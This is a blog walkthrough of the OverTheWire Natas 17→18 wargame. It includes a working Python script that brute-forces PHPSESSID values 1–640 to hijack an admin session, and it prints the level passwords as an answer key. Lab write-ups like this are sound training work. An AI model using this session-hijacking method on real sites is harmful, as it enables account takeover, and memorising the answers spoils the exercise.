Part time CTF Player learn every day!!
🌠 I Love Hoshimachi Suisei!! 🌠
🌠 I Love Hoshimachi Suisei!! 🌠
🌠 I Love Hoshimachi Suisei!! 🌠
🌠 I Love Hoshimachi Suisei!! 🌠
OverTheWire Natas Level 17 → 18 tutorial!!
Published on 30 Dec 2023
Login
URL: http://natas18.natas.labs.overthewire.org
Credentials: natas18:6OG1PbKdVjyBlpxgD4DDbRG6ZLlCGgCJ
# Using curl (optional):
curl -u natas18:6OG1PbKdVjyBlpxgD4DDbRG6ZLlCGgCJ
http://natas18.natas.labs.overthewire.org/
Task
The code shows that admin login is disabled, but sessions are handled with PHPSESSID.
IDs are assigned randomly between 1 and 640.
That means: if we brute-force the session ID, we might stumble upon an admin session.
A little bit of Theory
From the code:
$maxid = 640;
function createID($user) {
global $maxid;
return rand(1, $maxid);
}
if ($_SESSION["admin"] == 1) {
print "You are an admin...";
}
So all we need is:
- Enumerate PHPSESSID values from
1to640. - Check which one corresponds to an admin session.
Solution
Step 1: Python brute force
import requests
URL = "http://natas18.natas.labs.overthewire.org/index.php"
s = requests.Session()
s.auth = ('natas18', '6OG1PbKdVjyBlpxgD4DDbRG6ZLlCGgCJ')
for sid in range(1, 641):
r = s.get(URL, cookies={"PHPSESSID": str(sid)})
if "Login as an admin" not in r.text:
print(f"[+] Admin session found! PHPSESSID={sid}\n")
print(r.text)
break
- It tries all session IDs from 1 to 640.
- For each attempt, it injects
PHPSESSIDas a cookie. - If the response does not contain “Login as an admin”, it means we are in an admin session.
Output
[+] Admin session found! PHPSESSID=119
You are an admin. The credentials for the next level are:
Username: natas19
Password: tnwER7PdfWkxsG4FNWUtoAZ9VyZTJqJr
Password
tnwER7PdfWkxsG4FNWUtoAZ9VyZTJqJr
Troubleshooting
- Always regular user? → Make sure you loop from
1to640inclusively. - Script stops too early? → Check your condition; you want to break only if
"Login as an admin"is not in the page. - Still not admin? → Some sessions might expire quickly; just re-run the script.
- Too slow? → Optimize by running requests asynchronously or narrowing the range if you already spotted a pattern.
Nice 🎉 That’s how you brute-forced PHP sessions to hijack an admin account. On to natas19 🚀
Thanks for reading!
Until next time — Otsumachi!! 💖☄️✨
all tags
GOT-overwrite aboutme aead ai alphanumeric-shellcode apt argc0 argon2 aslr assembly asymmetric atoi automation backbox bandit base64 bash beginner behemoth binary binary-exploitation binary-to-ascii blackarch blind blind-sqli blogging blue-team bruteforce buffer-overflow buffer-overwrite c caesar canary capabilities checksec command-injection commonmark cookie cron crypto cryptography ctf cutter cyberchef cybersecurity defenders detection dev directory-traversal dnf docs drifter ecc education elf env envp exploitation finale forensics format-string formulaone frequency frequency-analysis gcc gdb getchar gfm ghidra github-pages governance gpg guide hashing hkdf http jekyll jmpbuf kali kasiski kdf kernel keylength kramdown krypton lab ld_preload leviathan lfi lfsr linux linux-syscall llmops log-poisoning ltrace manpage markdown maze memcpy mitigations mitmproxy mlops narnia natas networking newline-injection nonce nop-sled nx object-injection obsidian openssl osint overflow overthewire package-manager pacman parrot path path-hijacking pathname php pie pkc pki pointer-trick pqc priv-esc privilege-escalation provable-security pwn pwntools pyshark python race-condition radare2 rag randomness recon red-team redirect relro requests ret2env ret2libc reverse-engineering reversing ricing roadmap rop rot13 rsa scapy security seed seo serialization session setjmp-longjmp setuid shell shellcode smoke soc sockets sprintf sql-injection srop stack-canary stack-overflow strace strcmp strcpy streamcipher strings strncpy strtoul substitution suid suisei symlink symmetric terminal test threat-intel time-based tls troubleshooting tshark type-juggling ubuntu udp utumno vigenere virtualbox virtualization vmware vortex walkthrough web windows wireshark writing wsl x86